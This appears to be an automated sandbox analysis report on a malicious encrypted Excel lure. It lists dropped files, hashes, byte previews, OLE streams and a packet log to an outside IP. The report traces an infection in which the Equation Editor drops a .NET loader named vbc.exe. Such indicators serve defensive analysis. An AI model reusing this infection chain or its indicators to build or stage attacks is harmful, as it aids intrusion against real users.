Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E476B363.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8E50EB0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF6436D2.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.091127811854214
Encrypted:	false
SSDEEP:	96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
MD5:	EB06F07412A815AED391F20298C1087B
SHA1:	AC0601FFC173F50B56C3AE2265C61B76711FBE01
SHA-256:	5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
SHA-512:	38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
Malicious:	false
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD088ACD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFD606D5.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8124530118203914
Encrypted:	false
SSDEEP:	3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
MD5:	955A9E08DFD3A0E31C7BCF66F9519FFC
SHA1:	F677467423105ACF39B76CB366F08152527052B3
SHA-256:	08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
SHA-512:	39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
Malicious:	false
Preview:	....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Temp\RegAsm.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64672
Entropy (8bit):	6.033474133573561
Encrypted:	false
SSDEEP:	768:PedoViadPL1DI9WzutSjeJan8dBhF541kE6Iq8HaVxlYDKz4yqibwEBbr:XiaFJkobMa8dBXG2zbVUDKz4yq3EBbr
MD5:	ADF76F395D5A0ECBBF005390B73C3FD2
SHA1:	017801B7EBD2CC0E1151EEBEC14630DBAEE48229
SHA-256:	5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
SHA-512:	9670AC5A10719FA312336B790EAD713D78A9999DB236AD0841A32CD689559B9F5F8469E3AF93400F1BE5BAF2B3723574F16EA554C2AAF638734FFF806F18DB2B
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Purchase Order Price List.xlsx, Detection: malicious, Browse Filename: Quote QU038097.doc, Detection: malicious, Browse Filename: 6Cprm97UTl.xls, Detection: malicious, Browse Filename: Payment_Confirmation_Slip.xlsx, Detection: malicious, Browse Filename: Overdue Invoice.xlsx, Detection: malicious, Browse Filename: Quotation.xlsx, Detection: malicious, Browse Filename: ENCLOSE ORDER LIST.xlsx, Detection: malicious, Browse Filename: PO INV 195167 & 195324.xlsx, Detection: malicious, Browse Filename: Bank letter.xlsx, Detection: malicious, Browse Filename: Quotation.xlsx, Detection: malicious, Browse Filename: PO 19030004.xlsx, Detection: malicious, Browse Filename: New PO PO20.xlsx, Detection: malicious, Browse Filename: ORDER LIST.xlsx, Detection: malicious, Browse Filename: RFQ 00112.xlsx, Detection: malicious, Browse Filename: inquiry.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.W..............0.................. ........@.. ....................... ......k.....`.....................................O.......8................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H........A..`p...........................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.;...}S......i.>...}T......i.>...}U.....+m...(....o......r]..p.o ...,..{T.......{U........o!....+(.ra..p.o ...,..{T.......

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\RegAsm.exe
File Type:	ISO-8859 text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:FA3n:M
MD5:	2EBE3955A49AD21463B3FA81325FAE9D
SHA1:	8A70B8494E579301B9E4D998EAC9D93A9044452D
SHA-256:	79075C30BBDB1408DC286CCBF49F38E510D17811D15416B833B74829978D6579
SHA-512:	121C86EE0C3459C7311EA014E68077C2C5B610B9FBA8078FA142FD9BB95A5A6E7AAF33650EC4366A74592D6BA20B877550E48A712503E8A4B6B0717F1EFC8AEA
Malicious:	true
Preview:	.m%.X+.H

C:\Users\user\AppData\Roaming\win33.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	734208
Entropy (8bit):	7.833756558737052
Encrypted:	false
SSDEEP:	12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
MD5:	EB43B3C033BD76B51B90A51A6726A81C
SHA1:	0D39FFCF64ED4F38EA83A72D726D40881F583014
SHA-256:	4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
SHA-512:	7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\win33.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.....................@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~...9p...&8f....:....8....8....8...........(......(0...&~..........~......0..t........(.... ....~!...:....& ....8....8........E.... .......8....8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....~...

C:\Users\user\Desktop\~$Ref 0180066743.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	734208
Entropy (8bit):	7.833756558737052
Encrypted:	false
SSDEEP:	12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
MD5:	EB43B3C033BD76B51B90A51A6726A81C
SHA1:	0D39FFCF64ED4F38EA83A72D726D40881F583014
SHA-256:	4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
SHA-512:	7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.....................@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~...9p...&8f....:....8....8....8...........(......(0...&~..........~......0..t........(.... ....~!...:....& ....8....8........E.... .......8....8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....~...

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995449899424773
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Ref 0180066743.xlsx
File size:	1250304
MD5:	dffc9e820070887fd0e4a4973e847a36
SHA1:	32c5185f4aa508cc60ad331e4b3046dce732135c
SHA256:	9d7b5114111ce6382d022e2e43344b2608db07ecbbf13da758dd220e8df90394
SHA512:	619c5af981e220ee0caf478bc931ff61608b97482beb5b688df8e4ffbb9045c196300db763f09be702fe65c0eb9a9c3591f6d61a1afc289236a658b7f67b1a20
SSDEEP:	24576:ePrkOTZ/gbYRYYQjrX/4k0msjwet+bybolCT6ntNMdVGPyB:Arx/gbYRY9X/4k0ms7+OGCsoa0
File Content Preview:	........................>.......................................................................................................\|.......~...............z......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Ref 0180066743.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1236152

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1236152
Entropy:	7.99983137636
Base64 Encoded:	True
Data ASCII:	. . . . . . . . ^ M { B = . 7 K . $ . . . . 8 . . * . . S . . . . a . . . . . . T . . . ^ . . % . . " s . . . . . . . o . . . . B . i . , . . * . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # }
Data Raw:	ae dc 12 00 00 00 00 00 5e 4d 7b 42 3d 0f 37 4b 8b 24 aa 1e fb c0 38 07 99 2a 9b f9 53 c3 c5 99 0c 61 cc dc ad 00 d2 12 54 ae a8 a3 5e ff d1 25 cc cf 22 73 12 b9 06 e5 fb e6 da 6f 86 f2 e9 ca 42 a7 69 13 2c 18 e7 2a 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.56771105117
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . j . . . O . . . R W . . * . a . . . . 5 . . . . . > . . . . X 2 . . . . . . X ( . . . . m _ X O . u \\ . r . . . . . . . . . . : [ . . L
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 08:04:56.928414106 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.064789057 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.064953089 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.065510035 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205565929 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205605984 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205631018 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205636024 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205655098 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205658913 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205662012 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205681086 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205688953 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205704927 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205705881 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205732107 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205737114 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205756903 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205761909 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205785036 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205789089 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205809116 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.205815077 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.205838919 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.215353012 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342072964 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342111111 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342137098 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342159033 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342180014 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342197895 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342211008 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342216015 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342232943 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342250109 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342256069 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342259884 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342272997 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342283010 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342299938 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342303991 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342313051 CEST	49167	80	192.168.2.22	198.12.127.155
